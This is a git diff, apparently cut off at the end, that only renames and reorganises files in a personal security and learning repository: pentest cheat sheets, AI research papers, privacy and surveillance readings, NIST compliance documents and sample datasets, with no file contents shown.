diff --git a/References/Get_Started-MaderasSecurityArsenal.md b/CheatSheets/Get_Started-MaderasSecurityArsenal.md similarity index 100% rename from References/Get_Started-MaderasSecurityArsenal.md rename to CheatSheets/Get_Started-MaderasSecurityArsenal.md diff --git a/References/Search_Engines_for_Pentesters.jpg b/CheatSheets/Search_Engines_for_Pentesters.jpg similarity index 100% rename from References/Search_Engines_for_Pentesters.jpg rename to CheatSheets/Search_Engines_for_Pentesters.jpg diff --git "a/References/Using Cloudflare to bypass Cloudflare \342\200\223 Certitude Blog.pdf" "b/CheatSheets/Using Cloudflare to bypass Cloudflare \342\200\223 Certitude Blog.pdf" similarity index 100% rename from "References/Using Cloudflare to bypass Cloudflare \342\200\223 Certitude Blog.pdf" rename to "CheatSheets/Using Cloudflare to bypass Cloudflare \342\200\223 Certitude Blog.pdf" diff --git a/Web-Applications/CORS.md b/CheatSheets/Web-Applications/CORS.md similarity index 100% rename from Web-Applications/CORS.md rename to CheatSheets/Web-Applications/CORS.md diff --git a/Web-Applications/CSRF.md b/CheatSheets/Web-Applications/CSRF.md similarity index 100% rename from Web-Applications/CSRF.md rename to CheatSheets/Web-Applications/CSRF.md diff --git a/Web-Applications/HTML.md b/CheatSheets/Web-Applications/HTML.md similarity index 100% rename from Web-Applications/HTML.md rename to CheatSheets/Web-Applications/HTML.md diff --git a/Web-Applications/PathTraversal.md b/CheatSheets/Web-Applications/PathTraversal.md similarity index 100% rename from Web-Applications/PathTraversal.md rename to CheatSheets/Web-Applications/PathTraversal.md diff --git a/Web-Applications/README.md b/CheatSheets/Web-Applications/README.md similarity index 100% rename from Web-Applications/README.md rename to CheatSheets/Web-Applications/README.md diff --git a/Web-Applications/SQL_injection_payloads.md b/CheatSheets/Web-Applications/SQL_injection_payloads.md similarity index 100% rename from Web-Applications/SQL_injection_payloads.md rename to CheatSheets/Web-Applications/SQL_injection_payloads.md diff --git a/Web-Applications/SSRF_bypassFilters.txt b/CheatSheets/Web-Applications/SSRF_bypassFilters.md similarity index 100% rename from Web-Applications/SSRF_bypassFilters.txt rename to CheatSheets/Web-Applications/SSRF_bypassFilters.md diff --git a/Web-Applications/WebApp-ExploitsChecklist.pdf b/CheatSheets/Web-Applications/WebApp-ExploitsChecklist.pdf similarity index 100% rename from Web-Applications/WebApp-ExploitsChecklist.pdf rename to CheatSheets/Web-Applications/WebApp-ExploitsChecklist.pdf diff --git a/Web-Applications/XSS.md b/CheatSheets/Web-Applications/XSS.md similarity index 100% rename from Web-Applications/XSS.md rename to CheatSheets/Web-Applications/XSS.md diff --git a/Web-Applications/XSS_contexts.md b/CheatSheets/Web-Applications/XSS_contexts.md similarity index 100% rename from Web-Applications/XSS_contexts.md rename to CheatSheets/Web-Applications/XSS_contexts.md diff --git a/Web-Applications/injection_fundamentals.md b/CheatSheets/Web-Applications/injection_fundamentals.md similarity index 100% rename from Web-Applications/injection_fundamentals.md rename to CheatSheets/Web-Applications/injection_fundamentals.md diff --git a/Web-Applications/web_hacking_example_workflow.md b/CheatSheets/Web-Applications/web_hacking_example_workflow.md similarity index 100% rename from Web-Applications/web_hacking_example_workflow.md rename to CheatSheets/Web-Applications/web_hacking_example_workflow.md diff --git a/References/linux_performance_tuning.jpg b/CheatSheets/linux_performance_tuning.jpg similarity index 100% rename from References/linux_performance_tuning.jpg rename to CheatSheets/linux_performance_tuning.jpg diff --git a/References/splunk-quick-reference-guide_6-7-24.pdf b/CheatSheets/splunk-quick-reference-guide_6-7-24.pdf similarity index 100% rename from References/splunk-quick-reference-guide_6-7-24.pdf rename to CheatSheets/splunk-quick-reference-guide_6-7-24.pdf diff --git "a/References/text-processing/Parsing for Pentesters - F\342\200\231Awk Yeah! Advanced sed and awk Usage (Parsing for Pentesters 3) _ by Jeff Dimmock _ Posts By SpecterOps Team Members.pdf" "b/CheatSheets/text-processing/Parsing for Pentesters - F\342\200\231Awk Yeah! Advanced sed and awk Usage (Parsing for Pentesters 3) _ by Jeff Dimmock _ Posts By SpecterOps Team Members.pdf" similarity index 100% rename from "References/text-processing/Parsing for Pentesters - F\342\200\231Awk Yeah! Advanced sed and awk Usage (Parsing for Pentesters 3) _ by Jeff Dimmock _ Posts By SpecterOps Team Members.pdf" rename to "CheatSheets/text-processing/Parsing for Pentesters - F\342\200\231Awk Yeah! Advanced sed and awk Usage (Parsing for Pentesters 3) _ by Jeff Dimmock _ Posts By SpecterOps Team Members.pdf" diff --git a/References/text-processing/Text_Processing_and_Shell_Operations.md b/CheatSheets/text-processing/Text_Processing_and_Shell_Operations.md similarity index 100% rename from References/text-processing/Text_Processing_and_Shell_Operations.md rename to CheatSheets/text-processing/Text_Processing_and_Shell_Operations.md diff --git a/Documents/Continuous-Learning/Generative-AI/A Rubric for ML Production Readiness and Technical Debt Reduction.pdf b/EduDocuments/Continuous-Learning/Generative-AI/A Rubric for ML Production Readiness and Technical Debt Reduction.pdf similarity index 100% rename from Documents/Continuous-Learning/Generative-AI/A Rubric for ML Production Readiness and Technical Debt Reduction.pdf rename to EduDocuments/Continuous-Learning/Generative-AI/A Rubric for ML Production Readiness and Technical Debt Reduction.pdf diff --git a/Documents/Continuous-Learning/Generative-AI/AI_systems_as_state_actors-Crawford-Schultz.pdf b/EduDocuments/Continuous-Learning/Generative-AI/AI_systems_as_state_actors-Crawford-Schultz.pdf similarity index 100% rename from Documents/Continuous-Learning/Generative-AI/AI_systems_as_state_actors-Crawford-Schultz.pdf rename to EduDocuments/Continuous-Learning/Generative-AI/AI_systems_as_state_actors-Crawford-Schultz.pdf diff --git a/Documents/Continuous-Learning/Generative-AI/Better and Faster Large Language Models via Multi-token Prediction 2404.19737v1.pdf b/EduDocuments/Continuous-Learning/Generative-AI/Better and Faster Large Language Models via Multi-token Prediction 2404.19737v1.pdf similarity index 100% rename from Documents/Continuous-Learning/Generative-AI/Better and Faster Large Language Models via Multi-token Prediction 2404.19737v1.pdf rename to EduDocuments/Continuous-Learning/Generative-AI/Better and Faster Large Language Models via Multi-token Prediction 2404.19737v1.pdf diff --git a/Documents/Continuous-Learning/Generative-AI/Code Generation with AlphaCodium From Prompt Engineering to Flow-2401.08500.pdf b/EduDocuments/Continuous-Learning/Generative-AI/Code Generation with AlphaCodium From Prompt Engineering to Flow-2401.08500.pdf similarity index 100% rename from Documents/Continuous-Learning/Generative-AI/Code Generation with AlphaCodium From Prompt Engineering to Flow-2401.08500.pdf rename to EduDocuments/Continuous-Learning/Generative-AI/Code Generation with AlphaCodium From Prompt Engineering to Flow-2401.08500.pdf diff --git a/Documents/Continuous-Learning/Generative-AI/HistoryOfSecretary_GenderRoles_&AISecretaries-Crwaford.pdf b/EduDocuments/Continuous-Learning/Generative-AI/HistoryOfSecretary_GenderRoles_&AISecretaries-Crwaford.pdf similarity index 100% rename from Documents/Continuous-Learning/Generative-AI/HistoryOfSecretary_GenderRoles_&AISecretaries-Crwaford.pdf rename to EduDocuments/Continuous-Learning/Generative-AI/HistoryOfSecretary_GenderRoles_&AISecretaries-Crwaford.pdf diff --git a/Documents/Continuous-Learning/Generative-AI/Least-to-Most Prompting Enables Complex Reasoning in Large Language Models-2205.10625.pdf b/EduDocuments/Continuous-Learning/Generative-AI/Least-to-Most Prompting Enables Complex Reasoning in Large Language Models-2205.10625.pdf similarity index 100% rename from Documents/Continuous-Learning/Generative-AI/Least-to-Most Prompting Enables Complex Reasoning in Large Language Models-2205.10625.pdf rename to EduDocuments/Continuous-Learning/Generative-AI/Least-to-Most Prompting Enables Complex Reasoning in Large Language Models-2205.10625.pdf diff --git a/Documents/Continuous-Learning/Generative-AI/Mamba Linear-Time Sequence Modeling with Selective State Spaces 2312.00752.pdf b/EduDocuments/Continuous-Learning/Generative-AI/Mamba Linear-Time Sequence Modeling with Selective State Spaces 2312.00752.pdf similarity index 100% rename from Documents/Continuous-Learning/Generative-AI/Mamba Linear-Time Sequence Modeling with Selective State Spaces 2312.00752.pdf rename to EduDocuments/Continuous-Learning/Generative-AI/Mamba Linear-Time Sequence Modeling with Selective State Spaces 2312.00752.pdf diff --git a/Documents/Continuous-Learning/Generative-AI/PowerWithoutResponsibilityInAI-Crawford.pdf b/EduDocuments/Continuous-Learning/Generative-AI/PowerWithoutResponsibilityInAI-Crawford.pdf similarity index 100% rename from Documents/Continuous-Learning/Generative-AI/PowerWithoutResponsibilityInAI-Crawford.pdf rename to EduDocuments/Continuous-Learning/Generative-AI/PowerWithoutResponsibilityInAI-Crawford.pdf diff --git a/Documents/Continuous-Learning/Generative-AI/RAPTOR RECURSIVE ABSTRACTIVE PROCESSING - 2401.18059.pdf b/EduDocuments/Continuous-Learning/Generative-AI/RAPTOR RECURSIVE ABSTRACTIVE PROCESSING - 2401.18059.pdf similarity index 100% rename from Documents/Continuous-Learning/Generative-AI/RAPTOR RECURSIVE ABSTRACTIVE PROCESSING - 2401.18059.pdf rename to EduDocuments/Continuous-Learning/Generative-AI/RAPTOR RECURSIVE ABSTRACTIVE PROCESSING - 2401.18059.pdf diff --git a/Documents/Continuous-Learning/Generative-AI/ReAct-SYNERGIZING REASONING AND ACTING IN LANGUAGE MODELS-2210.03629.pdf b/EduDocuments/Continuous-Learning/Generative-AI/ReAct-SYNERGIZING REASONING AND ACTING IN LANGUAGE MODELS-2210.03629.pdf similarity index 100% rename from Documents/Continuous-Learning/Generative-AI/ReAct-SYNERGIZING REASONING AND ACTING IN LANGUAGE MODELS-2210.03629.pdf rename to EduDocuments/Continuous-Learning/Generative-AI/ReAct-SYNERGIZING REASONING AND ACTING IN LANGUAGE MODELS-2210.03629.pdf diff --git a/Documents/Continuous-Learning/Generative-AI/SustAIn_Magazine_2022_EN.pdf b/EduDocuments/Continuous-Learning/Generative-AI/SustAIn_Magazine_2022_EN.pdf similarity index 100% rename from Documents/Continuous-Learning/Generative-AI/SustAIn_Magazine_2022_EN.pdf rename to EduDocuments/Continuous-Learning/Generative-AI/SustAIn_Magazine_2022_EN.pdf diff --git a/Documents/Continuous-Learning/Generative-AI/Tree of Thoughts - Deliberate Problem Solving with LLMs - Machine Learning - AI.pdf b/EduDocuments/Continuous-Learning/Generative-AI/Tree of Thoughts - Deliberate Problem Solving with LLMs - Machine Learning - AI.pdf similarity index 100% rename from Documents/Continuous-Learning/Generative-AI/Tree of Thoughts - Deliberate Problem Solving with LLMs - Machine Learning - AI.pdf rename to EduDocuments/Continuous-Learning/Generative-AI/Tree of Thoughts - Deliberate Problem Solving with LLMs - Machine Learning - AI.pdf diff --git a/Documents/Continuous-Learning/Generative-AI/ai-anatomy-map.pdf b/EduDocuments/Continuous-Learning/Generative-AI/ai-anatomy-map.pdf similarity index 100% rename from Documents/Continuous-Learning/Generative-AI/ai-anatomy-map.pdf rename to EduDocuments/Continuous-Learning/Generative-AI/ai-anatomy-map.pdf diff --git a/Documents/Continuous-Learning/Generative-AI/ai-anatomy-publication-Crawford.pdf b/EduDocuments/Continuous-Learning/Generative-AI/ai-anatomy-publication-Crawford.pdf similarity index 100% rename from Documents/Continuous-Learning/Generative-AI/ai-anatomy-publication-Crawford.pdf rename to EduDocuments/Continuous-Learning/Generative-AI/ai-anatomy-publication-Crawford.pdf diff --git a/Documents/Continuous-Learning/Generative-AI/corrective-retrieval-augmented-generation-2401.15884.pdf b/EduDocuments/Continuous-Learning/Generative-AI/corrective-retrieval-augmented-generation-2401.15884.pdf similarity index 100% rename from Documents/Continuous-Learning/Generative-AI/corrective-retrieval-augmented-generation-2401.15884.pdf rename to EduDocuments/Continuous-Learning/Generative-AI/corrective-retrieval-augmented-generation-2401.15884.pdf diff --git a/Documents/Continuous-Learning/Generative-AI/mckinsey_and_company_whats-the-future-of-generative-ai-an-early-view-in-15-charts.pdf b/EduDocuments/Continuous-Learning/Generative-AI/mckinsey_and_company_whats-the-future-of-generative-ai-an-early-view-in-15-charts.pdf similarity index 100% rename from Documents/Continuous-Learning/Generative-AI/mckinsey_and_company_whats-the-future-of-generative-ai-an-early-view-in-15-charts.pdf rename to EduDocuments/Continuous-Learning/Generative-AI/mckinsey_and_company_whats-the-future-of-generative-ai-an-early-view-in-15-charts.pdf diff --git a/Documents/Continuous-Learning/Generative-AI/practitioners_guide_to_mlops_whitepaper.pdf b/EduDocuments/Continuous-Learning/Generative-AI/practitioners_guide_to_mlops_whitepaper.pdf similarity index 100% rename from Documents/Continuous-Learning/Generative-AI/practitioners_guide_to_mlops_whitepaper.pdf rename to EduDocuments/Continuous-Learning/Generative-AI/practitioners_guide_to_mlops_whitepaper.pdf diff --git a/Documents/Continuous-Learning/Generative-AI/self-reflective-retrieval-augmented-generation-2310.11511.pdf b/EduDocuments/Continuous-Learning/Generative-AI/self-reflective-retrieval-augmented-generation-2310.11511.pdf similarity index 100% rename from Documents/Continuous-Learning/Generative-AI/self-reflective-retrieval-augmented-generation-2310.11511.pdf rename to EduDocuments/Continuous-Learning/Generative-AI/self-reflective-retrieval-augmented-generation-2310.11511.pdf diff --git a/Documents/Continuous-Learning/Privacy/Brave_Goggles_whitepaper.pdf b/EduDocuments/Continuous-Learning/Privacy/Brave_Goggles_whitepaper.pdf similarity index 100% rename from Documents/Continuous-Learning/Privacy/Brave_Goggles_whitepaper.pdf rename to EduDocuments/Continuous-Learning/Privacy/Brave_Goggles_whitepaper.pdf diff --git a/Documents/Continuous-Learning/Privacy/Extreme Privacy-Data Removal Workbook.pdf b/EduDocuments/Continuous-Learning/Privacy/Extreme Privacy-Data Removal Workbook.pdf similarity index 100% rename from Documents/Continuous-Learning/Privacy/Extreme Privacy-Data Removal Workbook.pdf rename to EduDocuments/Continuous-Learning/Privacy/Extreme Privacy-Data Removal Workbook.pdf diff --git a/Documents/Continuous-Learning/Privacy/HowCivilRightsViolationsImpactPoliceData_Whitepaper-Crawford.pdf b/EduDocuments/Continuous-Learning/Privacy/HowCivilRightsViolationsImpactPoliceData_Whitepaper-Crawford.pdf similarity index 100% rename from Documents/Continuous-Learning/Privacy/HowCivilRightsViolationsImpactPoliceData_Whitepaper-Crawford.pdf rename to EduDocuments/Continuous-Learning/Privacy/HowCivilRightsViolationsImpactPoliceData_Whitepaper-Crawford.pdf diff --git a/Documents/Continuous-Learning/Privacy/RecordsComputersandtheRightsofCitizens.pdf b/EduDocuments/Continuous-Learning/Privacy/RecordsComputersandtheRightsofCitizens.pdf similarity index 100% rename from Documents/Continuous-Learning/Privacy/RecordsComputersandtheRightsofCitizens.pdf rename to EduDocuments/Continuous-Learning/Privacy/RecordsComputersandtheRightsofCitizens.pdf diff --git a/Documents/Continuous-Learning/Privacy/The Internet and Democracy Global Catalyst or Democratic Dud.pdf b/EduDocuments/Continuous-Learning/Privacy/The Internet and Democracy Global Catalyst or Democratic Dud.pdf similarity index 100% rename from Documents/Continuous-Learning/Privacy/The Internet and Democracy Global Catalyst or Democratic Dud.pdf rename to EduDocuments/Continuous-Learning/Privacy/The Internet and Democracy Global Catalyst or Democratic Dud.pdf diff --git a/Documents/Continuous-Learning/Privacy/TheFutureOfOnlineAdvertising.pdf b/EduDocuments/Continuous-Learning/Privacy/TheFutureOfOnlineAdvertising.pdf similarity index 100% rename from Documents/Continuous-Learning/Privacy/TheFutureOfOnlineAdvertising.pdf rename to EduDocuments/Continuous-Learning/Privacy/TheFutureOfOnlineAdvertising.pdf diff --git a/Documents/Continuous-Learning/US-State_Surveillance-Psyops/06_Rogers_Bienvenue_CDR_V6N3_2021.pdf b/EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/06_Rogers_Bienvenue_CDR_V6N3_2021.pdf similarity index 100% rename from Documents/Continuous-Learning/US-State_Surveillance-Psyops/06_Rogers_Bienvenue_CDR_V6N3_2021.pdf rename to EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/06_Rogers_Bienvenue_CDR_V6N3_2021.pdf diff --git a/Documents/Continuous-Learning/US-State_Surveillance-Psyops/2016-02-01-Scientific-American-How-Data-Brokers-Make-Money-Off-Your-Medical-Records(1).pdf b/EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/2016-02-01-Scientific-American-How-Data-Brokers-Make-Money-Off-Your-Medical-Records(1).pdf similarity index 100% rename from Documents/Continuous-Learning/US-State_Surveillance-Psyops/2016-02-01-Scientific-American-How-Data-Brokers-Make-Money-Off-Your-Medical-Records(1).pdf rename to EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/2016-02-01-Scientific-American-How-Data-Brokers-Make-Money-Off-Your-Medical-Records(1).pdf diff --git a/Documents/Continuous-Learning/US-State_Surveillance-Psyops/20210122_CW Final.pdf b/EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/20210122_CW Final.pdf similarity index 100% rename from Documents/Continuous-Learning/US-State_Surveillance-Psyops/20210122_CW Final.pdf rename to EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/20210122_CW Final.pdf diff --git a/Documents/Continuous-Learning/US-State_Surveillance-Psyops/A Resource Guide on racial Profiling Data Collection Systems.pdf b/EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/A Resource Guide on racial Profiling Data Collection Systems.pdf similarity index 100% rename from Documents/Continuous-Learning/US-State_Surveillance-Psyops/A Resource Guide on racial Profiling Data Collection Systems.pdf rename to EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/A Resource Guide on racial Profiling Data Collection Systems.pdf diff --git a/Documents/Continuous-Learning/US-State_Surveillance-Psyops/AD1044678.pdf b/EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/AD1044678.pdf similarity index 100% rename from Documents/Continuous-Learning/US-State_Surveillance-Psyops/AD1044678.pdf rename to EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/AD1044678.pdf diff --git a/Documents/Continuous-Learning/US-State_Surveillance-Psyops/Apple spyPhone - Public-Statement-Siri-recordings-TLB.pdf b/EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/Apple spyPhone - Public-Statement-Siri-recordings-TLB.pdf similarity index 100% rename from Documents/Continuous-Learning/US-State_Surveillance-Psyops/Apple spyPhone - Public-Statement-Siri-recordings-TLB.pdf rename to EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/Apple spyPhone - Public-Statement-Siri-recordings-TLB.pdf diff --git a/Documents/Continuous-Learning/US-State_Surveillance-Psyops/CIA report on consciousness.pdf b/EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/CIA report on consciousness.pdf similarity index 100% rename from Documents/Continuous-Learning/US-State_Surveillance-Psyops/CIA report on consciousness.pdf rename to EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/CIA report on consciousness.pdf diff --git a/Documents/Continuous-Learning/US-State_Surveillance-Psyops/Cognitive Warfare.pdf b/EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/Cognitive Warfare.pdf similarity index 100% rename from Documents/Continuous-Learning/US-State_Surveillance-Psyops/Cognitive Warfare.pdf rename to EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/Cognitive Warfare.pdf diff --git a/Documents/Continuous-Learning/US-State_Surveillance-Psyops/Containment Control for a Social network with State-Dependent Connectivity.pdf b/EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/Containment Control for a Social network with State-Dependent Connectivity.pdf similarity index 100% rename from Documents/Continuous-Learning/US-State_Surveillance-Psyops/Containment Control for a Social network with State-Dependent Connectivity.pdf rename to EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/Containment Control for a Social network with State-Dependent Connectivity.pdf diff --git a/Documents/Continuous-Learning/US-State_Surveillance-Psyops/Edward Snowden_Permanent Record.pdf b/EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/Edward Snowden_Permanent Record.pdf similarity index 100% rename from Documents/Continuous-Learning/US-State_Surveillance-Psyops/Edward Snowden_Permanent Record.pdf rename to EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/Edward Snowden_Permanent Record.pdf diff --git a/Documents/Continuous-Learning/US-State_Surveillance-Psyops/FB-o5o2WYAAiFrl.png b/EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/FB-o5o2WYAAiFrl.png similarity index 100% rename from Documents/Continuous-Learning/US-State_Surveillance-Psyops/FB-o5o2WYAAiFrl.png rename to EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/FB-o5o2WYAAiFrl.png diff --git a/Documents/Continuous-Learning/US-State_Surveillance-Psyops/FB-o_zoX0AUynbv.png b/EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/FB-o_zoX0AUynbv.png similarity index 100% rename from Documents/Continuous-Learning/US-State_Surveillance-Psyops/FB-o_zoX0AUynbv.png rename to EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/FB-o_zoX0AUynbv.png diff --git a/Documents/Continuous-Learning/US-State_Surveillance-Psyops/FB-pKfMWYAA7WPk.png b/EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/FB-pKfMWYAA7WPk.png similarity index 100% rename from Documents/Continuous-Learning/US-State_Surveillance-Psyops/FB-pKfMWYAA7WPk.png rename to EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/FB-pKfMWYAA7WPk.png diff --git a/Documents/Continuous-Learning/US-State_Surveillance-Psyops/FB-pRL-X0AU0GdI.png b/EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/FB-pRL-X0AU0GdI.png similarity index 100% rename from Documents/Continuous-Learning/US-State_Surveillance-Psyops/FB-pRL-X0AU0GdI.png rename to EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/FB-pRL-X0AU0GdI.png diff --git a/Documents/Continuous-Learning/US-State_Surveillance-Psyops/FBI_CAST_PhoneGeoLocationGuide.pdf b/EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/FBI_CAST_PhoneGeoLocationGuide.pdf similarity index 100% rename from Documents/Continuous-Learning/US-State_Surveillance-Psyops/FBI_CAST_PhoneGeoLocationGuide.pdf rename to EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/FBI_CAST_PhoneGeoLocationGuide.pdf diff --git a/Documents/Continuous-Learning/US-State_Surveillance-Psyops/FR2568pXEAshq3o.jfif b/EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/FR2568pXEAshq3o.jfif similarity index 100% rename from Documents/Continuous-Learning/US-State_Surveillance-Psyops/FR2568pXEAshq3o.jfif rename to EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/FR2568pXEAshq3o.jfif diff --git a/Documents/Continuous-Learning/US-State_Surveillance-Psyops/Memo197_e_compressed.pdf b/EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/Memo197_e_compressed.pdf similarity index 100% rename from Documents/Continuous-Learning/US-State_Surveillance-Psyops/Memo197_e_compressed.pdf rename to EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/Memo197_e_compressed.pdf diff --git a/Documents/Continuous-Learning/US-State_Surveillance-Psyops/NATO-Comprehensive-Approach-Report-2021_final.pdf b/EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/NATO-Comprehensive-Approach-Report-2021_final.pdf similarity index 100% rename from Documents/Continuous-Learning/US-State_Surveillance-Psyops/NATO-Comprehensive-Approach-Report-2021_final.pdf rename to EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/NATO-Comprehensive-Approach-Report-2021_final.pdf diff --git a/Documents/Continuous-Learning/US-State_Surveillance-Psyops/NDC fm_9.pdf b/EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/NDC fm_9.pdf similarity index 100% rename from Documents/Continuous-Learning/US-State_Surveillance-Psyops/NDC fm_9.pdf rename to EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/NDC fm_9.pdf diff --git a/Documents/Pentest_Resources-TCM_Security/Demo Company - Security Assessment Findings Report.docx b/EduDocuments/Pentest_Resources-TCM_Security/Demo Company - Security Assessment Findings Report.docx similarity index 100% rename from Documents/Pentest_Resources-TCM_Security/Demo Company - Security Assessment Findings Report.docx rename to EduDocuments/Pentest_Resources-TCM_Security/Demo Company - Security Assessment Findings Report.docx diff --git a/Documents/Pentest_Resources-TCM_Security/Subnetting - Cheat Sheet.pdf b/EduDocuments/Pentest_Resources-TCM_Security/Subnetting - Cheat Sheet.pdf similarity index 100% rename from Documents/Pentest_Resources-TCM_Security/Subnetting - Cheat Sheet.pdf rename to EduDocuments/Pentest_Resources-TCM_Security/Subnetting - Cheat Sheet.pdf diff --git a/Documents/Pentest_Resources-TCM_Security/TCMS - External Pentest Checklist.xlsx b/EduDocuments/Pentest_Resources-TCM_Security/TCMS - External Pentest Checklist.xlsx similarity index 100% rename from Documents/Pentest_Resources-TCM_Security/TCMS - External Pentest Checklist.xlsx rename to EduDocuments/Pentest_Resources-TCM_Security/TCMS - External Pentest Checklist.xlsx diff --git a/Documents/Pentest_Resources-TCM_Security/sample-penetration-testing-report__OffensiveSecurity.pdf b/EduDocuments/Pentest_Resources-TCM_Security/sample-penetration-testing-report__OffensiveSecurity.pdf similarity index 100% rename from Documents/Pentest_Resources-TCM_Security/sample-penetration-testing-report__OffensiveSecurity.pdf rename to EduDocuments/Pentest_Resources-TCM_Security/sample-penetration-testing-report__OffensiveSecurity.pdf diff --git a/Documents/Compliance/800-171/NIST.SP.800-171r2.pdf b/EduDocuments/RegulatoryCompliance/800-171/NIST.SP.800-171r2.pdf similarity index 100% rename from Documents/Compliance/800-171/NIST.SP.800-171r2.pdf rename to EduDocuments/RegulatoryCompliance/800-171/NIST.SP.800-171r2.pdf diff --git a/Documents/Compliance/800-171/sp800-171r2-security-reqs.xlsx b/EduDocuments/RegulatoryCompliance/800-171/sp800-171r2-security-reqs.xlsx similarity index 100% rename from Documents/Compliance/800-171/sp800-171r2-security-reqs.xlsx rename to EduDocuments/RegulatoryCompliance/800-171/sp800-171r2-security-reqs.xlsx diff --git a/Documents/Compliance/800-53r5/SP_800-53_v5_1-derived-OSCAL.pdf b/EduDocuments/RegulatoryCompliance/800-53r5/SP_800-53_v5_1-derived-OSCAL.pdf similarity index 100% rename from Documents/Compliance/800-53r5/SP_800-53_v5_1-derived-OSCAL.pdf rename to EduDocuments/RegulatoryCompliance/800-53r5/SP_800-53_v5_1-derived-OSCAL.pdf diff --git a/Documents/Compliance/800-53r5/sp800-53r5-control-catalog.xlsx b/EduDocuments/RegulatoryCompliance/800-53r5/sp800-53r5-control-catalog.xlsx similarity index 100% rename from Documents/Compliance/800-53r5/sp800-53r5-control-catalog.xlsx rename to EduDocuments/RegulatoryCompliance/800-53r5/sp800-53r5-control-catalog.xlsx diff --git a/Documents/Compliance/800-63/NIST.SP.800-63-3.pdf b/EduDocuments/RegulatoryCompliance/800-63/NIST.SP.800-63-3.pdf similarity index 100% rename from Documents/Compliance/800-63/NIST.SP.800-63-3.pdf rename to EduDocuments/RegulatoryCompliance/800-63/NIST.SP.800-63-3.pdf diff --git a/Documents/Compliance/800-63/nist.sp.800-63a.pdf b/EduDocuments/RegulatoryCompliance/800-63/nist.sp.800-63a.pdf similarity index 100% rename from Documents/Compliance/800-63/nist.sp.800-63a.pdf rename to EduDocuments/RegulatoryCompliance/800-63/nist.sp.800-63a.pdf diff --git a/Documents/Compliance/800-63/nist.sp.800-63b.pdf b/EduDocuments/RegulatoryCompliance/800-63/nist.sp.800-63b.pdf similarity index 100% rename from Documents/Compliance/800-63/nist.sp.800-63b.pdf rename to EduDocuments/RegulatoryCompliance/800-63/nist.sp.800-63b.pdf diff --git a/Documents/Compliance/800-63/nist.sp.800-63c.pdf b/EduDocuments/RegulatoryCompliance/800-63/nist.sp.800-63c.pdf similarity index 100% rename from Documents/Compliance/800-63/nist.sp.800-63c.pdf rename to EduDocuments/RegulatoryCompliance/800-63/nist.sp.800-63c.pdf diff --git a/Documents/Compliance/800-66r2/NIST.SP.800-66r2.pdf b/EduDocuments/RegulatoryCompliance/800-66r2/NIST.SP.800-66r2.pdf similarity index 100% rename from Documents/Compliance/800-66r2/NIST.SP.800-66r2.pdf rename to EduDocuments/RegulatoryCompliance/800-66r2/NIST.SP.800-66r2.pdf diff --git a/Documents/Compliance/NIST.CSWP.04162018.pdf b/EduDocuments/RegulatoryCompliance/NIST.CSWP.04162018.pdf similarity index 100% rename from Documents/Compliance/NIST.CSWP.04162018.pdf rename to EduDocuments/RegulatoryCompliance/NIST.CSWP.04162018.pdf diff --git a/Documents/Compliance/visa-cisp-what-to-do-if-compromised.pdf b/EduDocuments/RegulatoryCompliance/visa-cisp-what-to-do-if-compromised.pdf similarity index 100% rename from Documents/Compliance/visa-cisp-what-to-do-if-compromised.pdf rename to EduDocuments/RegulatoryCompliance/visa-cisp-what-to-do-if-compromised.pdf diff --git a/Documents/Sample_Datasets/BigML_Dataset_5f50a62795a9306aa200003e.csv b/EduDocuments/Sample_Datasets/BigML_Dataset_5f50a62795a9306aa200003e.csv similarity index 100% rename from Documents/Sample_Datasets/BigML_Dataset_5f50a62795a9306aa200003e.csv rename to EduDocuments/Sample_Datasets/BigML_Dataset_5f50a62795a9306aa200003e.csv diff --git a/Documents/Sample_Datasets/Global YouTube Statistics.csv b/EduDocuments/Sample_Datasets/Global YouTube Statistics.csv similarity index 100% rename from Documents/Sample_Datasets/Global YouTube Statistics.csv rename to EduDocuments/Sample_Datasets/Global YouTube Statistics.csv diff --git a/Documents/Sample_Datasets/Global poverty and inequality dataset_pip_codebook.csv b/EduDocuments/Sample_Datasets/Global poverty and inequality dataset_pip_codebook.csv similarity index 100% rename from Documents/Sample_Datasets/Global poverty and inequality dataset_pip_codebook.csv rename to EduDocuments/Sample_Datasets/Global poverty and inequality dataset_pip_codebook.csv diff --git a/Documents/Sample_Datasets/Global poverty and inequality dataset_pip_dataset.csv b/EduDocuments/Sample_Datasets/Global poverty and inequality dataset_pip_dataset.csv similarity index 100% rename from Documents/Sample_Datasets/Global poverty and inequality dataset_pip_dataset.csv rename to EduDocuments/Sample_Datasets/Global poverty and inequality 